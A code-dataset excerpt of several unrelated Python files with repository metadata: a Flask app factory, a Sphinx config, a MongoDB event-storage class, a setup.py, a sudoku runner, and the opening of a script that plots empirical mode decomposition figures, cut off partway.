cfg.load()
# TODO: do this default settings thing better?
default_app_config = dict(
display_timezone=cfg.display_timezone,
FREEZER_BASE_URL=get_base_url(),
FREEZER_STATIC_IGNORE=["*.scss", ".webassets-cache/*", ".DS_Store"],
FREEZER_RELATIVE_URLS=False,
FREEZER_REMOVE_EXTRA_FILES=True,
)
logger.info(f"create_app() => {default_app_config=}")
app.config.update(default_app_config)
return app
if __name__ == "__main__":
app = create_app()
app.run(
host="0.0.0.0",
debug=True,
)
| 24.444444 | 87 | 0.648347 | 319 | 2,420 | 4.711599 | 0.413793 | 0.035928 | 0.033932 | 0.03992 | 0.141051 | 0.141051 | 0.086494 | 0.086494 | 0.086494 | 0.086494 | 0 | 0.008952 | 0.215289 | 2,420 | 98 | 88 | 24.693878 | 0.782517 | 0.06281 | 0 | 0.04 | 0 | 0 | 0.150133 | 0.0093 | 0 | 0 | 0 | 0.010204 | 0 | 1 | 0.08 | false | 0 | 0.106667 | 0.04 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6aca7a5f520c3a19c81c989f925529d891ca4d67
| 661 |
py
|
Python
|
_doc/sphinxdoc/source/conf.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | null | null | null |
_doc/sphinxdoc/source/conf.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | null | null | null |
_doc/sphinxdoc/source/conf.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | null | null | null |
import sys
import os
import sphinx_rtd_theme
source_path = os.path.normpath(
os.path.join(
os.path.abspath(
os.path.split(__file__)[0])))
try:
from conf_base import *
except ImportError:
sys.path.append(source_path)
from conf_base import *
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
templates_path = [os.path.join(source_path, 'phdoc_static')]
html_static_path = [os.path.join(source_path, 'phdoc_static')]
if not os.path.exists(templates_path[0]):
raise FileNotFoundError(templates_path[0])
blog_root = "http://www.xavierdupre.fr/app/ensae_teaching_cs/helpsphinx3/"
| 25.423077 | 74 | 0.741301 | 98 | 661 | 4.673469 | 0.428571 | 0.091703 | 0.091703 | 0.078603 | 0.152838 | 0.152838 | 0.152838 | 0.152838 | 0 | 0 | 0 | 0.00703 | 0.139183 | 661 | 25 | 75 | 26.44 | 0.797891 | 0 | 0 | 0.105263 | 0 | 0 | 0.151286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.315789 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
6acc395ad3bfafbc612c2d532d32bbb5ce80e13f
| 4,123 |
py
|
Python
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
lisy09/flink-ai-extended
|
011a5a332f7641f66086653e715d0596eab2e107
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-08-06T04:24:36.000Z
|
2021-08-06T04:24:36.000Z
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-05-20T02:17:11.000Z
|
2021-05-20T02:17:11.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import time
import socket
from collections import Iterable
from typing import Union, Tuple
from mongoengine import connect
from notification_service.event_storage import BaseEventStorage
from notification_service.base_notification import BaseEvent
from notification_service.mongo_notification import MongoEvent
class MongoEventStorage(BaseEventStorage):
def __init__(self, *args, **kwargs):
self.db_conn = self.setup_connection(**kwargs)
self.server_ip = socket.gethostbyname(socket.gethostname())
def setup_connection(self, **kwargs):
db_conf = {
"host": kwargs.get("host"),
"port": kwargs.get("port"),
"db": kwargs.get("db"),
}
username = kwargs.get("username", None)
password = kwargs.get("password", None)
authentication_source = kwargs.get("authentication_source", "admin")
if (username or password) and not (username and password):
raise Exception("Please provide valid username and password")
if username and password:
db_conf.update({
"username": username,
"password": password,
"authentication_source": authentication_source
})
return connect(**db_conf)
def get_latest_version(self, key: str, namespace: str = None):
mongo_events = MongoEvent.get_by_key(key, 0, 1, "-version")
if not mongo_events:
return 0
return mongo_events[0].version
def add_event(self, event: BaseEvent, uuid: str):
kwargs = {
"server_ip": self.server_ip,
"create_time": int(time.time() * 1000),
"event_type": event.event_type,
"key": event.key,
"value": event.value,
"context": event.context,
"namespace": event.namespace,
"sender": event.sender,
"uuid": uuid
}
mongo_event = MongoEvent(**kwargs)
mongo_event.save()
mongo_event.reload()
event.create_time = mongo_event.create_time
event.version = mongo_event.version
return event
def list_events(self,
key: Union[str, Tuple[str]],
version: int = None,
event_type: str = None,
start_time: int = None,
namespace: str = None,
sender: str = None):
key = None if key == "" else key
version = None if version == 0 else version
event_type = None if event_type == "" else event_type
namespace = None if namespace == "" else namespace
sender = None if sender == "" else sender
if isinstance(key, str):
key = (key,)
elif isinstance(key, Iterable):
key = tuple(key)
res = MongoEvent.get_base_events(key, version, event_type, start_time, namespace, sender)
return res
def list_all_events(self, start_time: int):
res = MongoEvent.get_base_events_by_time(start_time)
return res
def list_all_events_from_version(self, start_version: int, end_version: int = None):
res = MongoEvent.get_base_events_by_version(start_version, end_version)
return res
def clean_up(self):
MongoEvent.delete_by_client(self.server_ip)
| 38.175926 | 97 | 0.64031 | 494 | 4,123 | 5.192308 | 0.311741 | 0.024561 | 0.026901 | 0.023392 | 0.051462 | 0.041326 | 0 | 0 | 0 | 0 | 0 | 0.004329 | 0.271647 | 4,123 | 107 | 98 | 38.53271 | 0.849817 | 0.182391 | 0 | 0.037975 | 0 | 0 | 0.063544 | 0.01253 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101266 | false | 0.063291 | 0.101266 | 0 | 0.303797 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6accba984dd52f022ed6544e1f7ad42db7180437
| 665 |
py
|
Python
|
setup.py
|
rrwen/search_google
|
e647868ba5da2803e787a3c06b32e09452068736
|
[
"MIT"
] | 15 |
2017-08-24T18:44:55.000Z
|
2021-02-01T22:07:53.000Z
|
setup.py
|
rrwen/search_google
|
e647868ba5da2803e787a3c06b32e09452068736
|
[
"MIT"
] | 5 |
2017-09-05T12:25:09.000Z
|
2021-10-18T06:45:24.000Z
|
setup.py
|
rrwen/search_google
|
e647868ba5da2803e787a3c06b32e09452068736
|
[
"MIT"
] | 1 |
2018-02-20T13:44:44.000Z
|
2018-02-20T13:44:44.000Z
|
# -*- coding: utf-8 -*-
from setuptools import setup
import search_google as package
def readme():
with open('README.rst') as f:
return ''.join(f.readlines()[11:])
setup(
name=package.__name__,
version=package.__version__,
description=package.__description__,
long_description=readme(),
author=package.__author__,
author_email=package.__email__,
license=package.__license__,
url=package.__url__,
download_url=package.__download_url__,
keywords =package. __keywords__,
entry_points=package.__entry_points__,
packages=package.__packages__,
package_data=package.__package_data__,
install_requires=package.__install_requires__
)
| 24.62963 | 47 | 0.771429 | 77 | 665 | 5.844156 | 0.480519 | 0.044444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005119 | 0.118797 | 665 | 26 | 48 | 25.576923 | 0.762799 | 0.031579 | 0 | 0 | 0 | 0 | 0.015576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | true | 0 | 0.095238 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ad2141e919181f75e53ccffa43344d1aae6eea7
| 346 |
py
|
Python
|
main.py
|
BenG49/sudoku
|
e4b14655e23d04c161feb16ceb1338537f519bdb
|
[
"MIT"
] | null | null | null |
main.py
|
BenG49/sudoku
|
e4b14655e23d04c161feb16ceb1338537f519bdb
|
[
"MIT"
] | null | null | null |
main.py
|
BenG49/sudoku
|
e4b14655e23d04c161feb16ceb1338537f519bdb
|
[
"MIT"
] | null | null | null |
from sudoku import Sudoku
def main():
s = Sudoku.parse(
'''
-------------
| |2 | |
| | 6 |4 3|
| | 5| 7 |
-------------
| 7 | 2|8 |
|51 | 4|9 |
| 9| 3| |
-------------
| | 9| |
| 2| | 98|
| 83|1 |2 |
-------------
'''
)
print(s)
print(s.solve())
if __name__ == '__main__':
main()
| 12.814815 | 26 | 0.297688 | 38 | 346 | 2.5 | 0.605263 | 0.126316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105505 | 0.369942 | 346 | 26 | 27 | 13.307692 | 0.330275 | 0 | 0 | 0 | 0 | 0 | 0.062016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6adc3f2423ac6cf2c778f44e1751ae2e595e05f5
| 74,159 |
py
|
Python
|
jss_figures_replication_script.py
|
Cole-vJ/AdvEMDpy
|
160cd44b371a2c8aa66961f23062c1d7305dd728
|
[
"Unlicense"
] | null | null | null |
jss_figures_replication_script.py
|
Cole-vJ/AdvEMDpy
|
160cd44b371a2c8aa66961f23062c1d7305dd728
|
[
"Unlicense"
] | null | null | null |
jss_figures_replication_script.py
|
Cole-vJ/AdvEMDpy
|
160cd44b371a2c8aa66961f23062c1d7305dd728
|
[
"Unlicense"
] | null | null | null |
# ________
# /
# \ /
# \ /
# \/
import random
import textwrap
import emd_mean
import AdvEMDpy
import emd_basis
import emd_utils
import numpy as np
import pandas as pd
import cvxpy as cvx
import seaborn as sns
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from scipy.ndimage import gaussian_filter
from emd_utils import time_extension, Utility
from scipy.interpolate import CubicSpline
from emd_hilbert import Hilbert, hilbert_spectrum
from emd_preprocess import Preprocess
from emd_mean import Fluctuation
from AdvEMDpy import EMD
# alternate packages
from PyEMD import EMD as pyemd0215
import emd as emd040
sns.set(style='darkgrid')
pseudo_alg_time = np.linspace(0, 2 * np.pi, 1001)
pseudo_alg_time_series = np.sin(pseudo_alg_time) + np.sin(5 * pseudo_alg_time)
pseudo_utils = Utility(time=pseudo_alg_time, time_series=pseudo_alg_time_series)
# plot 0 - addition
fig = plt.figure(figsize=(9, 4))
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('First Iteration of Sifting Algorithm')
plt.plot(pseudo_alg_time, pseudo_alg_time_series, label=r'$h_{(1,0)}(t)$', zorder=1)
plt.scatter(pseudo_alg_time[pseudo_utils.max_bool_func_1st_order_fd()],
pseudo_alg_time_series[pseudo_utils.max_bool_func_1st_order_fd()],
c='r', label=r'$M(t_i)$', zorder=2)
plt.plot(pseudo_alg_time, np.sin(pseudo_alg_time) + 1, '--', c='r', label=r'$\tilde{h}_{(1,0)}^M(t)$', zorder=4)
plt.scatter(pseudo_alg_time[pseudo_utils.min_bool_func_1st_order_fd()],
pseudo_alg_time_series[pseudo_utils.min_bool_func_1st_order_fd()],
c='c', label=r'$m(t_j)$', zorder=3)
plt.plot(pseudo_alg_time, np.sin(pseudo_alg_time) - 1, '--', c='c', label=r'$\tilde{h}_{(1,0)}^m(t)$', zorder=5)
plt.plot(pseudo_alg_time, np.sin(pseudo_alg_time), '--', c='purple', label=r'$\tilde{h}_{(1,0)}^{\mu}(t)$', zorder=5)
plt.yticks(ticks=[-2, -1, 0, 1, 2])
plt.xticks(ticks=[0, np.pi, 2 * np.pi],
labels=[r'0', r'$\pi$', r'$2\pi$'])
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.95, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/pseudo_algorithm.png')
plt.show()
knots = np.arange(12)
time = np.linspace(0, 11, 1101)
basis = emd_basis.Basis(time=time, time_series=time)
b_spline_basis = basis.cubic_b_spline(knots)
chsi_basis = basis.chsi_basis(knots)
# plot 1
plt.title('Non-Natural Cubic B-Spline Bases at Boundary')
plt.plot(time[500:], b_spline_basis[2, 500:].T, '--', label=r'$ B_{-3,4}(t) $')
plt.plot(time[500:], b_spline_basis[3, 500:].T, '--', label=r'$ B_{-2,4}(t) $')
plt.plot(time[500:], b_spline_basis[4, 500:].T, '--', label=r'$ B_{-1,4}(t) $')
plt.plot(time[500:], b_spline_basis[5, 500:].T, '--', label=r'$ B_{0,4}(t) $')
plt.plot(time[500:], b_spline_basis[6, 500:].T, '--', label=r'$ B_{1,4}(t) $')
plt.xticks([5, 6], [r'$ \tau_0 $', r'$ \tau_1 $'])
plt.xlim(4.4, 6.6)
plt.plot(5 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
plt.plot(6 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
plt.legend(loc='upper left')
plt.savefig('jss_figures/boundary_bases.png')
plt.show()
# plot 1a - addition
knot_demonstrate_time = np.linspace(0, 2 * np.pi, 1001)
knot_demonstrate_time_series = np.sin(knot_demonstrate_time) + np.sin(5 * knot_demonstrate_time)
knots_uniform = np.linspace(0, 2 * np.pi, 51)
emd = EMD(time=knot_demonstrate_time, time_series=knot_demonstrate_time_series)
imfs = emd.empirical_mode_decomposition(knots=knots_uniform, edge_effect='anti-symmetric', verbose=False)[0]
fig, axs = plt.subplots(3, 1)
fig.subplots_adjust(hspace=0.6)
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Time Series and Uniform Knots')
axs[0].plot(knot_demonstrate_time, knot_demonstrate_time_series, Linewidth=2, zorder=100)
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].set_title('IMF 1 and Uniform Knots')
axs[1].plot(knot_demonstrate_time, imfs[1, :], Linewidth=2, zorder=100)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[1].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[2].set_title('IMF 2 and Uniform Knots')
axs[2].plot(knot_demonstrate_time, imfs[2, :], Linewidth=2, zorder=100)
axs[2].set_yticks(ticks=[-2, 0, 2])
axs[2].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[2].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[0].plot(knots_uniform[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[0].legend(loc='lower left')
axs[1].plot(knots_uniform[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[2].plot(knots_uniform[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
for i in range(3):
for j in range(1, len(knots_uniform)):
axs[i].plot(knots_uniform[j] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey')
plt.savefig('jss_figures/knot_uniform.png')
plt.show()
# plot 1b - addition
knot_demonstrate_time = np.linspace(0, 2 * np.pi, 1001)
knot_demonstrate_time_series = np.sin(knot_demonstrate_time) + np.sin(5 * knot_demonstrate_time)
emd = EMD(time=knot_demonstrate_time, time_series=knot_demonstrate_time_series)
imfs, _, _, _, knots, _, _ = emd.empirical_mode_decomposition(edge_effect='anti-symmetric',
optimise_knots=1, verbose=False)
fig, axs = plt.subplots(3, 1)
fig.subplots_adjust(hspace=0.6)
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Time Series and Statically Optimised Knots')
axs[0].plot(knot_demonstrate_time, knot_demonstrate_time_series, Linewidth=2, zorder=100)
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].set_title('IMF 1 and Statically Optimised Knots')
axs[1].plot(knot_demonstrate_time, imfs[1, :], Linewidth=2, zorder=100)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[1].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[2].set_title('IMF 2 and Statically Optimised Knots')
axs[2].plot(knot_demonstrate_time, imfs[2, :], Linewidth=2, zorder=100)
axs[2].set_yticks(ticks=[-2, 0, 2])
axs[2].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[2].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[0].plot(knots[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[0].legend(loc='lower left')
axs[1].plot(knots[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[2].plot(knots[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
for i in range(3):
for j in range(1, len(knots)):
axs[i].plot(knots[j] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey')
plt.savefig('jss_figures/knot_1.png')
plt.show()
# plot 1c - addition
knot_demonstrate_time = np.linspace(0, 2 * np.pi, 1001)
knot_demonstrate_time_series = np.sin(knot_demonstrate_time) + np.sin(5 * knot_demonstrate_time)
emd = EMD(time=knot_demonstrate_time, time_series=knot_demonstrate_time_series)
imfs, _, _, _, knots, _, _ = emd.empirical_mode_decomposition(edge_effect='anti-symmetric',
optimise_knots=2, verbose=False)
fig, axs = plt.subplots(3, 1)
fig.subplots_adjust(hspace=0.6)
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Time Series and Dynamically Optimised Knots')
axs[0].plot(knot_demonstrate_time, knot_demonstrate_time_series, Linewidth=2, zorder=100)
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].set_title('IMF 1 and Dynamically Knots')
axs[1].plot(knot_demonstrate_time, imfs[1, :], Linewidth=2, zorder=100)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[1].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[2].set_title('IMF 2 and Dynamically Knots')
axs[2].plot(knot_demonstrate_time, imfs[2, :], Linewidth=2, zorder=100)
axs[2].set_yticks(ticks=[-2, 0, 2])
axs[2].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[2].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[0].plot(knots[0][0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[0].legend(loc='lower left')
axs[1].plot(knots[1][0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[2].plot(knots[2][0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
for i in range(3):
for j in range(1, len(knots[i])):
axs[i].plot(knots[i][j] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey')
plt.savefig('jss_figures/knot_2.png')
plt.show()
# plot 1d - addition
window = 81
fig, axs = plt.subplots(2, 1)
fig.subplots_adjust(hspace=0.4)
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Preprocess Filtering Demonstration')
axs[1].set_title('Zoomed Region')
preprocess_time = pseudo_alg_time.copy()
np.random.seed(1)
random.seed(1)
preprocess_time_series = pseudo_alg_time_series + np.random.normal(0, 0.1, len(preprocess_time))
for i in random.sample(range(1000), 500):
preprocess_time_series[i] += np.random.normal(0, 1)
preprocess = Preprocess(time=preprocess_time, time_series=preprocess_time_series)
axs[0].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[0].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple',
label=textwrap.fill('Noiseless time series', 12))
axs[0].plot(preprocess_time, preprocess.mean_filter(window_width=window)[1], label=textwrap.fill('Mean filter', 12))
axs[0].plot(preprocess_time, preprocess.median_filter(window_width=window)[1], label=textwrap.fill('Median filter', 13))
axs[0].plot(preprocess_time, preprocess.winsorize(window_width=window, a=0.8)[1], label=textwrap.fill('Windsorize filter', 12))
axs[0].plot(preprocess_time, preprocess.winsorize_interpolate(window_width=window, a=0.8)[1],
label=textwrap.fill('Windsorize interpolation filter', 14))
axs[0].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.90)[1], c='grey',
label=textwrap.fill('Quantile window', 12))
axs[0].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.10)[1], c='grey')
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), -3 * np.ones(101), '--', c='black',
label=textwrap.fill('Zoomed region', 10))
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), 3 * np.ones(101), '--', c='black')
axs[0].plot(0.85 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].plot(1.15 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[1].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple', label=textwrap.fill('Noiseless time series', 12))
axs[1].plot(preprocess_time, preprocess.mean_filter(window_width=window)[1], label=textwrap.fill('Mean filter', 12))
axs[1].plot(preprocess_time, preprocess.median_filter(window_width=window)[1], label=textwrap.fill('Median filter', 13))
axs[1].plot(preprocess_time, preprocess.winsorize(window_width=window, a=0.8)[1], label=textwrap.fill('Windsorize filter', 12))
axs[1].plot(preprocess_time, preprocess.winsorize_interpolate(window_width=window, a=0.8)[1],
label=textwrap.fill('Windsorize interpolation filter', 14))
axs[1].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.90)[1], c='grey',
label=textwrap.fill('Quantile window', 12))
axs[1].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.10)[1], c='grey')
axs[1].set_xlim(0.85 * np.pi, 1.15 * np.pi)
axs[1].set_ylim(-3, 3)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[np.pi])
axs[1].set_xticklabels(labels=[r'$\pi$'])
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, -0.15))
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.05, box_1.y0, box_1.width * 0.85, box_1.height])
plt.savefig('jss_figures/preprocess_filter.png')
plt.show()
# plot 1e - addition
fig, axs = plt.subplots(2, 1)
fig.subplots_adjust(hspace=0.4)
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Preprocess Smoothing Demonstration')
axs[1].set_title('Zoomed Region')
axs[0].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[0].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple',
label=textwrap.fill('Noiseless time series', 12))
axs[0].plot(preprocess_time, preprocess.hp()[1],
label=textwrap.fill('Hodrick-Prescott smoothing', 12))
axs[0].plot(preprocess_time, preprocess.hw(order=51)[1],
label=textwrap.fill('Henderson-Whittaker smoothing', 13))
downsampled_and_decimated = preprocess.downsample()
axs[0].plot(downsampled_and_decimated[0], downsampled_and_decimated[1],
label=textwrap.fill('Downsampled & decimated', 11))
downsampled = preprocess.downsample(decimate=False)
axs[0].plot(downsampled[0], downsampled[1],
label=textwrap.fill('Downsampled', 13))
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), -3 * np.ones(101), '--', c='black',
label=textwrap.fill('Zoomed region', 10))
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), 3 * np.ones(101), '--', c='black')
axs[0].plot(0.85 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].plot(1.15 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[1].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple',
label=textwrap.fill('Noiseless time series', 12))
axs[1].plot(preprocess_time, preprocess.hp()[1],
label=textwrap.fill('Hodrick-Prescott smoothing', 12))
axs[1].plot(preprocess_time, preprocess.hw(order=51)[1],
label=textwrap.fill('Henderson-Whittaker smoothing', 13))
axs[1].plot(downsampled_and_decimated[0], downsampled_and_decimated[1],
label=textwrap.fill('Downsampled & decimated', 13))
axs[1].plot(downsampled[0], downsampled[1],
label=textwrap.fill('Downsampled', 13))
axs[1].set_xlim(0.85 * np.pi, 1.15 * np.pi)
axs[1].set_ylim(-3, 3)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[np.pi])
axs[1].set_xticklabels(labels=[r'$\pi$'])
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.06, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, -0.15))
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.06, box_1.y0, box_1.width * 0.85, box_1.height])
plt.savefig('jss_figures/preprocess_smooth.png')
plt.show()
# plot 2
fig, axs = plt.subplots(1, 2, sharey=True)
axs[0].set_title('Cubic B-Spline Bases')
axs[0].plot(time, b_spline_basis[2, :].T, '--', label='Basis 1')
axs[0].plot(time, b_spline_basis[3, :].T, '--', label='Basis 2')
axs[0].plot(time, b_spline_basis[4, :].T, '--', label='Basis 3')
axs[0].plot(time, b_spline_basis[5, :].T, '--', label='Basis 4')
axs[0].legend(loc='upper left')
axs[0].plot(5 * np.ones(100), np.linspace(-0.2, 0.8, 100), 'k-')
axs[0].plot(6 * np.ones(100), np.linspace(-0.2, 0.8, 100), 'k-')
axs[0].set_xticks([5, 6])
axs[0].set_xticklabels([r'$ \tau_k $', r'$ \tau_{k+1} $'])
axs[0].set_xlim(4.5, 6.5)
axs[1].set_title('Cubic Hermite Spline Bases')
axs[1].plot(time, chsi_basis[10, :].T, '--')
axs[1].plot(time, chsi_basis[11, :].T, '--')
axs[1].plot(time, chsi_basis[12, :].T, '--')
axs[1].plot(time, chsi_basis[13, :].T, '--')
axs[1].plot(5 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
axs[1].plot(6 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
axs[1].set_xticks([5, 6])
axs[1].set_xticklabels([r'$ \tau_k $', r'$ \tau_{k+1} $'])
axs[1].set_xlim(4.5, 6.5)
plt.savefig('jss_figures/comparing_bases.png')
plt.show()
# plot 3
a = 0.25
width = 0.2
time = np.linspace(0, (5 - a) * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
